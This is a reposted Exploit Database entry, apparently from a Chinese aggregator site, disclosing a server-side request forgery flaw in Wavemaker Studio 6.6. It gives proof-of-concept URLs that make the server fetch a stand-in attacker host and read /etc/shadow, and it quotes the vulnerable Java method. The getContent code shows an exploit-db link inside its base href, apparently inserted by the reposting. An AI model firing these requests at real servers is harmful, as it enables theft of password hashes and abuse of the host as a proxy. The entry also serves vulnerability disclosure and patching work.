Wavemaker Studio 6.6 – Server-Side Request Forgery

• Exploit Database
• 11 阅读

• 作者： Gionathan Reale
  日期： 2018-08-06
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/45158/

• # Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
  # Exploit Author: Gionathan "John" Reale
  # Google Dork: N/A
  # Date: 2018-08-01
  # Vendor Homepage: http://www.wavemaker.com/
  # Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
  # Affected Version: 6.6
  # Tested on: Parrot OS
  # CVE : 2019-8982
   
  # Description
  # Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an 
  # attacker to pass dangerous content to a victim via a phishing link. The vulnerability
  # can also be exploited to access sensitive data or to use the server hosting Wavemaker
  # as a form of HTTP proxy among other things.
   
  # Proof Of Concept
  http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
  http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
  
  # Vulnerable Code
  # /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
  
  # Line 419-430
  @ExposeToClient
  public String getContent(String inUrl) throws IOException {
  	try {
  			String str = getRemoteContent(inUrl);
  str = str.replace("<head>", "<head><base href='https://www.exploit-db.com/exploits/45158/" + inUrl
  + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
  return str;
  } catch (Exception e) {
  return "";
  }
  }